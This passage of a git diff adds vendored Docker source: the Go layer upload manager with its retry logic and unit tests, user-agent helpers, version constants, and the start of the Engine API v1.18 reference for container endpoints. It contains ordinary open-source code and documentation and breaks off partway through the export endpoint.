+// An UploadDescriptor references a layer that may need to be uploaded.
+type UploadDescriptor interface {
+	// Key returns the key used to deduplicate uploads.
+	Key() string
+	// ID returns the ID for display purposes.
+	ID() string
+	// DiffID should return the DiffID for this layer.
+	DiffID() layer.DiffID
+	// Upload is called to perform the Upload.
+	Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error)
+	// SetRemoteDescriptor provides the distribution.Descriptor that was
+	// returned by Upload. This descriptor is not to be confused with
+	// the UploadDescriptor interface, which is used for internally
+	// identifying layers that are being uploaded.
+	SetRemoteDescriptor(descriptor distribution.Descriptor)
+}
+
+// Upload is a blocking function which ensures the listed layers are present on
+// the remote registry. It uses the string returned by the Key method to
+// deduplicate uploads.
+func (lum *LayerUploadManager) Upload(ctx context.Context, layers []UploadDescriptor, progressOutput progress.Output) error {
+	var (
+		uploads          []*uploadTransfer
+		dedupDescriptors = make(map[string]*uploadTransfer)
+	)
+
+	for _, descriptor := range layers {
+		progress.Update(progressOutput, descriptor.ID(), "Preparing")
+
+		key := descriptor.Key()
+		if _, present := dedupDescriptors[key]; present {
+			continue
+		}
+
+		xferFunc := lum.makeUploadFunc(descriptor)
+		upload, watcher := lum.tm.Transfer(descriptor.Key(), xferFunc, progressOutput)
+		defer upload.Release(watcher)
+		uploads = append(uploads, upload.(*uploadTransfer))
+		dedupDescriptors[key] = upload.(*uploadTransfer)
+	}
+
+	for _, upload := range uploads {
+		select {
+		case <-ctx.Done():
+			return ctx.Err()
+		case <-upload.Transfer.Done():
+			if upload.err != nil {
+				return upload.err
+			}
+		}
+	}
+	for _, l := range layers {
+		l.SetRemoteDescriptor(dedupDescriptors[l.Key()].remoteDescriptor)
+	}
+
+	return nil
+}
+
+func (lum *LayerUploadManager) makeUploadFunc(descriptor UploadDescriptor) DoFunc {
+	return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
+		u := &uploadTransfer{
+			Transfer: NewTransfer(),
+		}
+
+		go func() {
+			defer func() {
+				close(progressChan)
+			}()
+
+			progressOutput := progress.ChanOutput(progressChan)
+
+			select {
+			case <-start:
+			default:
+				progress.Update(progressOutput, descriptor.ID(), "Waiting")
+				<-start
+			}
+
+			retries := 0
+			for {
+				remoteDescriptor, err := descriptor.Upload(u.Transfer.Context(), progressOutput)
+				if err == nil {
+					u.remoteDescriptor = remoteDescriptor
+					break
+				}
+
+				// If an error was returned because the context
+				// was cancelled, we shouldn't retry.
+				select {
+				case <-u.Transfer.Context().Done():
+					u.err = err
+					return
+				default:
+				}
+
+				retries++
+				if _, isDNR := err.(DoNotRetry); isDNR || retries == maxUploadAttempts {
+					logrus.Errorf("Upload failed: %v", err)
+					u.err = err
+					return
+				}
+
+				logrus.Errorf("Upload failed, retrying: %v", err)
+				delay := retries * 5
+				ticker := time.NewTicker(time.Second)
+
+			selectLoop:
+				for {
+					progress.Updatef(progressOutput, descriptor.ID(), "Retrying in %d second%s", delay, (map[bool]string{true: "s"})[delay != 1])
+					select {
+					case <-ticker.C:
+						delay--
+						if delay == 0 {
+							ticker.Stop()
+							break selectLoop
+						}
+					case <-u.Transfer.Context().Done():
+						ticker.Stop()
+						u.err = errors.New("upload cancelled during retry delay")
+						return
+					}
+				}
+			}
+		}()
+
+		return u
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go
new file mode 100644
index 0000000000..16bd187336
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go
@@ -0,0 +1,134 @@
+package xfer
+
+import (
+	"errors"
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/docker/distribution"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/progress"
+	"golang.org/x/net/context"
+)
+
+const maxUploadConcurrency = 3
+
+type mockUploadDescriptor struct {
+	currentUploads  *int32
+	diffID          layer.DiffID
+	simulateRetries int
+}
+
+// Key returns the key used to deduplicate downloads.
+func (u *mockUploadDescriptor) Key() string {
+	return u.diffID.String()
+}
+
+// ID returns the ID for display purposes.
+func (u *mockUploadDescriptor) ID() string {
+	return u.diffID.String()
+}
+
+// DiffID should return the DiffID for this layer.
+func (u *mockUploadDescriptor) DiffID() layer.DiffID {
+	return u.diffID
+}
+
+// SetRemoteDescriptor is not used in the mock.
+func (u *mockUploadDescriptor) SetRemoteDescriptor(remoteDescriptor distribution.Descriptor) {
+}
+
+// Upload is called to perform the upload.
+func (u *mockUploadDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) {
+	if u.currentUploads != nil {
+		defer atomic.AddInt32(u.currentUploads, -1)
+
+		if atomic.AddInt32(u.currentUploads, 1) > maxUploadConcurrency {
+			return distribution.Descriptor{}, errors.New("concurrency limit exceeded")
+		}
+	}
+
+	// Sleep a bit to simulate a time-consuming upload.
+	for i := int64(0); i <= 10; i++ {
+		select {
+		case <-ctx.Done():
+			return distribution.Descriptor{}, ctx.Err()
+		case <-time.After(10 * time.Millisecond):
+			progressOutput.WriteProgress(progress.Progress{ID: u.ID(), Current: i, Total: 10})
+		}
+	}
+
+	if u.simulateRetries != 0 {
+		u.simulateRetries--
+		return distribution.Descriptor{}, errors.New("simulating retry")
+	}
+
+	return distribution.Descriptor{}, nil
+}
+
+func uploadDescriptors(currentUploads *int32) []UploadDescriptor {
+	return []UploadDescriptor{
+		&mockUploadDescriptor{currentUploads, layer.DiffID("sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"), 0},
+		&mockUploadDescriptor{currentUploads, layer.DiffID("sha256:1515325234325236634634608943609283523908626098235490238423902343"), 0},
+		&mockUploadDescriptor{currentUploads, layer.DiffID("sha256:6929356290463485374960346430698374523437683470934634534953453453"), 0},
+		&mockUploadDescriptor{currentUploads, layer.DiffID("sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"), 0},
+		&mockUploadDescriptor{currentUploads, layer.DiffID("sha256:8159352387436803946235346346368745389534789534897538734598734987"), 1},
+		&mockUploadDescriptor{currentUploads, layer.DiffID("sha256:4637863963478346897346987346987346789346789364879364897364987346"), 0},
+	}
+}
+
+func TestSuccessfulUpload(t *testing.T) {
+	lum := NewLayerUploadManager(maxUploadConcurrency)
+
+	progressChan := make(chan progress.Progress)
+	progressDone := make(chan struct{})
+	receivedProgress := make(map[string]int64)
+
+	go func() {
+		for p := range progressChan {
+			receivedProgress[p.ID] = p.Current
+		}
+		close(progressDone)
+	}()
+
+	var currentUploads int32
+	descriptors := uploadDescriptors(&currentUploads)
+
+	err := lum.Upload(context.Background(), descriptors, progress.ChanOutput(progressChan))
+	if err != nil {
+		t.Fatalf("upload error: %v", err)
+	}
+
+	close(progressChan)
+	<-progressDone
+}
+
+func TestCancelledUpload(t *testing.T) {
+	lum := NewLayerUploadManager(maxUploadConcurrency)
+
+	progressChan := make(chan progress.Progress)
+	progressDone := make(chan struct{})
+
+	go func() {
+		for range progressChan {
+		}
+		close(progressDone)
+	}()
+
+	ctx, cancel := context.WithCancel(context.Background())
+
+	go func() {
+		<-time.After(time.Millisecond)
+		cancel()
+	}()
+
+	descriptors := uploadDescriptors(nil)
+	err := lum.Upload(ctx, descriptors, progress.ChanOutput(progressChan))
+	if err != context.Canceled {
+		t.Fatal("expected upload to be cancelled")
+	}
+
+	close(progressChan)
+	<-progressDone
+}
diff --git a/vendor/github.com/docker/docker/dockerversion/useragent.go b/vendor/github.com/docker/docker/dockerversion/useragent.go
new file mode 100644
index 0000000000..d2a891c4d6
--- /dev/null
+++ b/vendor/github.com/docker/docker/dockerversion/useragent.go
@@ -0,0 +1,74 @@
+package dockerversion
+
+import (
+	"fmt"
+	"runtime"
+
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/docker/docker/pkg/useragent"
+	"golang.org/x/net/context"
+)
+
+// DockerUserAgent is the User-Agent the Docker client uses to identify itself.
+// In accordance with RFC 7231 (5.5.3) is of the form:
+//    [docker client's UA] UpstreamClient([upstream client's UA])
+func DockerUserAgent(ctx context.Context) string {
+	httpVersion := make([]useragent.VersionInfo, 0, 6)
+	httpVersion = append(httpVersion, useragent.VersionInfo{Name: "docker", Version: Version})
+	httpVersion = append(httpVersion, useragent.VersionInfo{Name: "go", Version: runtime.Version()})
+	httpVersion = append(httpVersion, useragent.VersionInfo{Name: "git-commit", Version: GitCommit})
+	if kernelVersion, err := kernel.GetKernelVersion(); err == nil {
+		httpVersion = append(httpVersion, useragent.VersionInfo{Name: "kernel", Version: kernelVersion.String()})
+	}
+	httpVersion = append(httpVersion, useragent.VersionInfo{Name: "os", Version: runtime.GOOS})
+	httpVersion = append(httpVersion, useragent.VersionInfo{Name: "arch", Version: runtime.GOARCH})
+
+	dockerUA := useragent.AppendVersions("", httpVersion...)
+	upstreamUA := getUserAgentFromContext(ctx)
+	if len(upstreamUA) > 0 {
+		ret := insertUpstreamUserAgent(upstreamUA, dockerUA)
+		return ret
+	}
+	return dockerUA
+}
+
+// getUserAgentFromContext returns the previously saved user-agent context stored in ctx, if one exists
+func getUserAgentFromContext(ctx context.Context) string {
+	var upstreamUA string
+	if ctx != nil {
+		var ki interface{} = ctx.Value(httputils.UAStringKey)
+		if ki != nil {
+			upstreamUA = ctx.Value(httputils.UAStringKey).(string)
+		}
+	}
+	return upstreamUA
+}
+
+// escapeStr returns s with every rune in charsToEscape escaped by a backslash
+func escapeStr(s string, charsToEscape string) string {
+	var ret string
+	for _, currRune := range s {
+		appended := false
+		for _, escapeableRune := range charsToEscape {
+			if currRune == escapeableRune {
+				ret += `\` + string(currRune)
+				appended = true
+				break
+			}
+		}
+		if !appended {
+			ret += string(currRune)
+		}
+	}
+	return ret
+}
+
+// insertUpstreamUserAgent adds the upstream client useragent to create a user-agent
+// string of the form:
+//   $dockerUA UpstreamClient($upstreamUA)
+func insertUpstreamUserAgent(upstreamUA string, dockerUA string) string {
+	charsToEscape := `();\`
+	upstreamUAEscaped := escapeStr(upstreamUA, charsToEscape)
+	return fmt.Sprintf("%s UpstreamClient(%s)", dockerUA, upstreamUAEscaped)
+}
diff --git a/vendor/github.com/docker/docker/dockerversion/version_lib.go b/vendor/github.com/docker/docker/dockerversion/version_lib.go
new file mode 100644
index 0000000000..33f77d3ce6
--- /dev/null
+++ b/vendor/github.com/docker/docker/dockerversion/version_lib.go
@@ -0,0 +1,16 @@
+// +build !autogen
+
+// Package dockerversion is auto-generated at build-time
+package dockerversion
+
+// Default build-time variable for library-import.
+// This file is overridden on build with build-time informations.
+const (
+	GitCommit          string = "library-import"
+	Version            string = "library-import"
+	BuildTime          string = "library-import"
+	IAmStatic          string = "library-import"
+	ContainerdCommitID string = "library-import"
+	RuncCommitID       string = "library-import"
+	InitCommitID       string = "library-import"
+)
diff --git a/vendor/github.com/docker/docker/docs/README.md b/vendor/github.com/docker/docker/docs/README.md
new file mode 100644
index 0000000000..da93093075
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/README.md
@@ -0,0 +1,30 @@
+# The non-reference docs have been moved!
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+The documentation for Docker Engine has been merged into
+[the general documentation repo](https://github.com/docker/docker.github.io).
+
+See the [README](https://github.com/docker/docker.github.io/blob/master/README.md)
+for instructions on contributing to and building the documentation.
+
+If you'd like to edit the current published version of the Engine docs,
+do it in the master branch here:
+https://github.com/docker/docker.github.io/tree/master/engine
+
+If you need to document the functionality of an upcoming Engine release,
+use the `vnext-engine` branch:
+https://github.com/docker/docker.github.io/tree/vnext-engine/engine
+
+The reference docs have been left in docker/docker (this repo), which remains
+the place to edit them.
+
+The docs in the general repo are open-source and we appreciate
+your feedback and pull requests!
diff --git a/vendor/github.com/docker/docker/docs/api/v1.18.md b/vendor/github.com/docker/docker/docs/api/v1.18.md
new file mode 100644
index 0000000000..0db0c0f916
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/v1.18.md
@@ -0,0 +1,2156 @@
+---
+title: "Engine API v1.18"
+description: "API Documentation for Docker"
+keywords: "API, Docker, rcli, REST, documentation"
+redirect_from:
+- /engine/reference/api/docker_remote_api_v1.18/
+- /reference/api/docker_remote_api_v1.18/
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## 1. Brief introduction
+
+ - The daemon listens on `unix:///var/run/docker.sock` but you can
+   [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
+ - The API tends to be REST, but for some complex commands, like `attach`
+   or `pull`, the HTTP connection is hijacked to transport `STDOUT`,
+   `STDIN` and `STDERR`.
+
+## 2. Endpoints
+
+### 2.1 Containers
+
+#### List containers
+
+`GET /containers/json`
+
+List containers
+
+**Example request**:
+
+    GET /v1.18/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Id": "8dfafdbc3a40",
+                 "Names":["/boring_feynman"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 1",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
+                 "Labels": {
+                         "com.example.vendor": "Acme",
+                         "com.example.license": "GPL",
+                         "com.example.version": "1.0"
+                 },
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         },
+         {
+                 "Id": "9cd87474be90",
+                 "Names":["/coolName"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 222222",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         },
+         {
+                 "Id": "3176a2479c92",
+                 "Names":["/sleepy_dog"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 3333333333333333",
+                 "Created": 1367854154,
+                 "Status": "Exit 0",
+                 "Ports":[],
+                 "Labels": {},
+                 "SizeRw":12288,
+                 "SizeRootFs":0
+         },
+         {
+                 "Id": "4cb07b47f9fb",
+                 "Names":["/running_cat"],
+                 "Image": "ubuntu:latest",
+                 "Command": "echo 444444444444444444444444444444444",
+                 "Created": 1367854152,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         }
+    ]
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, Show all containers.
+        Only running containers are shown by default (i.e., this defaults to false)
+-   **limit** – Show `limit` last created
+        containers, include non-running ones.
+-   **since** – Show only containers created since Id, include
+        non-running ones.
+-   **before** – Show only containers created before Id, include
+        non-running ones.
+-   **size** – 1/True/true or 0/False/false, Show the containers
+        sizes
+-   **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters:
+  -   `exited=<int>`; -- containers with exit code of  `<int>` ;
+  -   `status=`(`restarting`|`running`|`paused`|`exited`)
+  -   `label=key` or `label="key=value"` of a container label
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **500** – server error
+
+#### Create a container
+
+`POST /containers/create`
+
+Create a container
+
+**Example request**:
+
+    POST /v1.18/containers/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+           "Hostname": "",
+           "Domainname": "",
+           "User": "",
+           "AttachStdin": false,
+           "AttachStdout": true,
+           "AttachStderr": true,
+           "Tty": false,
+           "OpenStdin": false,
+           "StdinOnce": false,
+           "Env": [
+                   "FOO=bar",
+                   "BAZ=quux"
+           ],
+           "Cmd": [
+                   "date"
+           ],
+           "Entrypoint": null,
+           "Image": "ubuntu",
+           "Labels": {
+                   "com.example.vendor": "Acme",
+                   "com.example.license": "GPL",
+                   "com.example.version": "1.0"
+           },
+           "Volumes": {
+             "/volumes/data": {}
+           },
+           "WorkingDir": "",
+           "NetworkDisabled": false,
+           "MacAddress": "12:34:56:78:9a:bc",
+           "ExposedPorts": {
+                   "22/tcp": {}
+           },
+           "HostConfig": {
+             "Binds": ["/tmp:/tmp"],
+             "Links": ["redis3:redis"],
+             "LxcConf": {"lxc.utsname":"docker"},
+             "Memory": 0,
+             "MemorySwap": 0,
+             "CpuShares": 512,
+             "CpusetCpus": "0,1",
+             "PidMode": "",
+             "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+             "PublishAllPorts": false,
+             "Privileged": false,
+             "ReadonlyRootfs": false,
+             "Dns": ["8.8.8.8"],
+             "DnsSearch": [""],
+             "ExtraHosts": null,
+             "VolumesFrom": ["parent", "other:ro"],
+             "CapAdd": ["NET_ADMIN"],
+             "CapDrop": ["MKNOD"],
+             "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+             "NetworkMode": "bridge",
+             "Devices": [],
+             "Ulimits": [{}],
+             "LogConfig": { "Type": "json-file", "Config": {} },
+             "SecurityOpt": [],
+             "CgroupParent": ""
+          }
+      }
+
+**Example response**:
+
+      HTTP/1.1 201 Created
+      Content-Type: application/json
+
+      {
+           "Id":"e90e34656806",
+           "Warnings":[]
+      }
+
+**JSON parameters**:
+
+-   **Hostname** - A string value containing the hostname to use for the
+      container.
+-   **Domainname** - A string value containing the domain name to use
+      for the container.
+-   **User** - A string value specifying the user inside the container.
+-   **AttachStdin** - Boolean value, attaches to `stdin`.
+-   **AttachStdout** - Boolean value, attaches to `stdout`.
+-   **AttachStderr** - Boolean value, attaches to `stderr`.
+-   **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed.
+-   **OpenStdin** - Boolean value, opens `stdin`,
+-   **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects.
+-   **Env** - A list of environment variables in the form of `["VAR=value", ...]`
+-   **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }`
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Entrypoint** - Set the entry point for the container as a string or an array
+      of strings.
+-   **Image** - A string specifying the image name to use for the container.
+-   **Volumes** - An object mapping mount point paths (strings) inside the
+      container to empty objects.
+-   **WorkingDir** - A string specifying the working directory for commands to
+      run in.
+-   **NetworkDisabled** - Boolean value, when true disables networking for the
+      container
+-   **ExposedPorts** - An object mapping ports to an empty object in the form of:
+      `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
+-   **HostConfig**
+    -   **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms:
+           + `host-src:container-dest` to bind-mount a host path into the
+             container. Both `host-src`, and `container-dest` must be an
+             _absolute_ path.
+           + `host-src:container-dest:ro` to make the bind-mount read-only
+             inside the container. Both `host-src`, and `container-dest` must be
+             an _absolute_ path.
+    -   **Links** - A list of links for the container. Each link entry should be
+          in the form of `container_name:alias`.
+    -   **LxcConf** - LXC specific configurations. These configurations only
+          work when using the `lxc` execution driver.
+    -   **Memory** - Memory limit in bytes.
+    -   **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap.
+          You must use this with `memory` and make the swap value larger than `memory`.
+    -   **CpuShares** - An integer value containing the container's CPU Shares
+          (ie. the relative weight vs other containers).
+    -   **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use.
+    -   **PidMode** - Set the PID (Process) Namespace mode for the container;
+          `"container:<name|id>"`: joins another container's PID namespace
+          `"host"`: use the host's PID namespace inside the container
+    -   **PortBindings** - A map of exposed container ports and the host port they
+          should map to. A JSON object in the form
+          `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
+          Take note that `port` is specified as a string and not an integer value.
+    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+          exposed ports. Specified as a boolean value.
+    -   **Privileged** - Gives the container full access to the host. Specified as
+          a boolean value.
+    -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+          Specified as a boolean value.
+    -   **Dns** - A list of DNS servers for the container to use.
+    -   **DnsSearch** - A list of DNS search domains
+    -   **ExtraHosts** - A list of hostnames/IP mappings to add to the
+        container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+    -   **VolumesFrom** - A list of volumes to inherit from another container.
+          Specified in the form `<container name>[:<ro|rw>]`
+    -   **CapAdd** - A list of kernel capabilities to add to the container.
+    -   **Capdrop** - A list of kernel capabilities to drop from the container.
+    -   **RestartPolicy** – The behavior to apply when the container exits.  The
+            value is an object with a `Name` property of either `"always"` to
+            always restart or `"on-failure"` to restart only when the container
+            exit code is non-zero.  If `on-failure` is used, `MaximumRetryCount`
+            controls the number of times to retry before giving up.
+            The default is not to restart. (optional)
+            An ever increasing delay (double the previous delay, starting at 100mS)
+            is added before each restart to prevent flooding the server.
+    -   **NetworkMode** - Sets the networking mode for the container. Supported
+          values are: `bridge`, `host`, `none`, and `container:<name|id>`
+    -   **Devices** - A list of devices to add to the container specified as a JSON object in the
+      form
+          `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+    -   **Ulimits** - A list of ulimits to set in the container, specified as
+          `{ "Name": <name>, "Soft": <soft limit>, "Hard": <hard limit> }`, for example:
+          `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+    -   **SecurityOpt**: A list of string values to customize labels for MLS
+        systems, such as SELinux.
+    -   **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+          `{ "Type": "<driver_name>", "Config": {"key1": "val1"}}`.
+          Available types: `json-file`, `syslog`, `journald`, `none`.
+          `json-file` logging driver.
+    -   **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist.
+
+**Query parameters**:
+
+-   **name** – Assign the specified name to the container. Must
+    match `/?[a-zA-Z0-9_-]+`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **406** – impossible to attach (container not running)
+-   **409** – conflict
+-   **500** – server error
+
+#### Inspect a container
+
+`GET /containers/(id or name)/json`
+
+Return low-level information on the container `id`
+
+**Example request**:
+
+      GET /v1.18/containers/4fa6e0f0c678/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+	{
+		"AppArmorProfile": "",
+		"Args": [
+			"-c",
+			"exit 9"
+		],
+		"Config": {
+			"AttachStderr": true,
+			"AttachStdin": false,
+			"AttachStdout": true,
+			"Cmd": [
+				"/bin/sh",
+				"-c",
+				"exit 9"
+			],
+			"Domainname": "",
+			"Entrypoint": null,
+			"Env": [
+				"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+			],
+			"ExposedPorts": null,
+			"Hostname": "ba033ac44011",
+			"Image": "ubuntu",
+			"Labels": {
+				"com.example.vendor": "Acme",
+				"com.example.license": "GPL",
+				"com.example.version": "1.0"
+			},
+			"MacAddress": "",
+			"NetworkDisabled": false,
+			"OnBuild": null,
+			"OpenStdin": false,
+			"PortSpecs": null,
+			"StdinOnce": false,
+			"Tty": false,
+			"User": "",
+			"Volumes": null,
+			"WorkingDir": ""
+		},
+		"Created": "2015-01-06T15:47:31.485331387Z",
+		"Driver": "devicemapper",
+		"ExecDriver": "native-0.2",
+		"ExecIDs": null,
+		"HostConfig": {
+			"Binds": null,
+			"CapAdd": null,
+			"CapDrop": null,
+			"ContainerIDFile": "",
+			"CpusetCpus": "",
+			"CpuShares": 0,
+			"Devices": [],
+			"Dns": null,
+			"DnsSearch": null,
+			"ExtraHosts": null,
+			"IpcMode": "",
+			"Links": null,
+			"LxcConf": [],
+			"Memory": 0,
+			"MemorySwap": 0,
+			"NetworkMode": "bridge",
+			"PidMode": "",
+			"PortBindings": {},
+			"Privileged": false,
+			"ReadonlyRootfs": false,
+			"PublishAllPorts": false,
+			"RestartPolicy": {
+				"MaximumRetryCount": 2,
+				"Name": "on-failure"
+			},
+			"LogConfig": {
+				"Config": null,
+				"Type": "json-file"
+			},
+			"SecurityOpt": null,
+			"VolumesFrom": null,
+			"Ulimits": [{}]
+		},
+		"HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname",
+		"HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts",
+		"LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+		"Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39",
+		"Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2",
+		"MountLabel": "",
+		"Name": "/boring_euclid",
+		"NetworkSettings": {
+			"Bridge": "",
+			"Gateway": "",
+			"IPAddress": "",
+			"IPPrefixLen": 0,
+			"MacAddress": "",
+			"PortMapping": null,
+			"Ports": null
+		},
+		"Path": "/bin/sh",
+		"ProcessLabel": "",
+		"ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf",
+		"RestartCount": 1,
+		"State": {
+			"Error": "",
+			"ExitCode": 9,
+			"FinishedAt": "2015-01-06T15:47:32.080254511Z",
+			"OOMKilled": false,
+			"Paused": false,
+			"Pid": 0,
+			"Restarting": false,
+			"Running": true,
+			"StartedAt": "2015-01-06T15:47:32.072697474Z"
+		},
+		"Volumes": {},
+		"VolumesRW": {}
+	}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### List processes running inside a container
+
+`GET /containers/(id or name)/top`
+
+List processes running inside the container `id`. On Unix systems this
+is done by running the `ps` command. This endpoint is not
+supported on Windows.
+
+**Example request**:
+
+    GET /v1.18/containers/4fa6e0f0c678/top HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Titles" : [
+         "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD"
+       ],
+       "Processes" : [
+         [
+           "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash"
+         ],
+         [
+           "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10"
+         ]
+       ]
+    }
+
+**Example request**:
+
+    GET /v1.18/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Titles" : [
+        "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND"
+      ]
+      "Processes" : [
+        [
+          "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash"
+        ],
+        [
+          "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10"
+        ]
+      ],
+    }
+
+**Query parameters**:
+
+-   **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef`
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container logs
+
+`GET /containers/(id or name)/logs`
+
+Get `stdout` and `stderr` logs from the container ``id``
+
+> **Note**:
+> This endpoint works only for containers with the `json-file` or `journald` logging drivers.
+
+**Example request**:
+
+     GET /v1.18/containers/4fa6e0f0c678/logs?stderr=1&stdout=1&timestamps=1&follow=1&tail=10 HTTP/1.1
+
+**Example response**:
+
+     HTTP/1.1 101 UPGRADED
+     Content-Type: application/vnd.docker.raw-stream
+     Connection: Upgrade
+     Upgrade: tcp
+
+     {% raw %}
+     {{ STREAM }}
+     {% endraw %}
+
+**Query parameters**:
+
+-   **follow** – 1/True/true or 0/False/false, return stream. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`.
+-   **timestamps** – 1/True/true or 0/False/false, print timestamps for
+        every log line. Default `false`.
+-   **tail** – Output specified number of lines at the end of logs: `all` or `<number>`. Default all.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **404** – no such container
+-   **500** – server error
+
+#### Inspect changes on a container's filesystem
+
+`GET /containers/(id or name)/changes`
+
+Inspect changes on container `id`'s filesystem
+
+**Example request**:
+
+    GET /v1.18/containers/4fa6e0f0c678/changes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Path": "/dev",
+                 "Kind": 0
+         },
+         {
+                 "Path": "/dev/kmsg",
+                 "Kind": 1
+         },
+         {
+                 "Path": "/test",
+                 "Kind": 1
+         }
+    ]
+
+Values for `Kind`:
+
+- `0`: Modify
+- `1`: Add
+- `2`: Delete
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Export a container
+
+`GET /containers/(id or name)/export`
+
+Export the contents of container `id`
+
+**Example request**:
+
+    GET /v1.18/containers/4fa6e0f0c678/export HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/octet-stream
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
